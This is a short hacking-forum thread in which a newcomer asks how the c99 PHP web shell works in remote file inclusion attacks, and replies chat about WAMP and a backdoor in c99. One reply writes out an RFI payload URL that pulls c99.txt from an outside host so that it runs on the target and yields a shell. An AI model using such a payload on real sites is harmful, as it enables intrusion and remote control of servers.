Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

c99 shell.

0 0

Hello, I would like to get some more(I already googled) information about the c99.txt shell used during RFI, for instance:

1)how does it work? 2)what is it used for? 3)what can be done with it? 4)how do you interact with it(operate it)? 5)are there patches out there for it/how can it be denied from inclusion? 6)are there other shells like c99?

I would really appreciate the information, because im intrigued by this topic and basically want to know all about it :), also, Please do not flame ;), if this question does not come up to your standards, please do not reply at all, cause ive seen a lot of flaming and ive just joined.I dont want to involve myself in any of it.:angry::happy:

Thanks in advance.

TeFLoN101

0 0

Thank you mosbat, is that a real site or your server?:D

edit My first forum post.:)

0 0

site.com/index.php?site=http://evilc0der.net/c99.txt

This includes the text information for c99.txt (which is actually a php/html document) and includes it into a php document, thus the PHP code (and HTML to give it it's layout etc) are parsed and executed giving you a shell.

0 0

hmm okay thanks @ slpctrl

thanks mosbat :)

0 0

WAMP is great, I use it.

You Like this!
90 0

i use wamp to try to beat the timed challenges. but fail.

You Like this!
90 0

wow, there is a lot of things on it. Im keep getting timed out. is it down already?

You Like this!
90 0

ohh ok. I did not hat time to look around hat much.

0 0

Thanks all :)

0 0

dang…i didn't know c99 had a backup trojan installed in one of it's folders :0 Wow..better check that out…Captain Crunch